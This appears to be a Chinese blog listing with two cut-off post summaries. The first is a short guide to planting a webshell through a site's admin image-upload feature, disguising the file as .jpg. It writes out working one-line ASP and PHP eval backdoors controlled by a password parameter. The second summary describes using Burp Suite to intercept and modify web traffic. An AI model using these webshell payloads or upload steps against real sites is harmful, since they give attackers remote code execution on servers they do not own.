摘要： 前提：已经登入了网站的后台1.在后台中找到一个可以上传文件的地方 （一些上传图片的地方）2.在本机中写一个一句话木马 后缀用.jpg asp: <%eval request("pass")%> pass 为自己设定的密码 php: <?php @eval($_POST[ 'pass' ]);?>3. 阅读全文

摘要： 主要功能： burp suite 可以将客户端与服务器之间传输的数据进行拦截，然后对数据进行修改并在此发送，从而完成攻击设置代理服务器 Proxy/Options/listeners中，可设置默认的监听IP地址的端口号 建议用Firefox 或ChromeIE内核不同的浏览器burp suite 也 阅读全文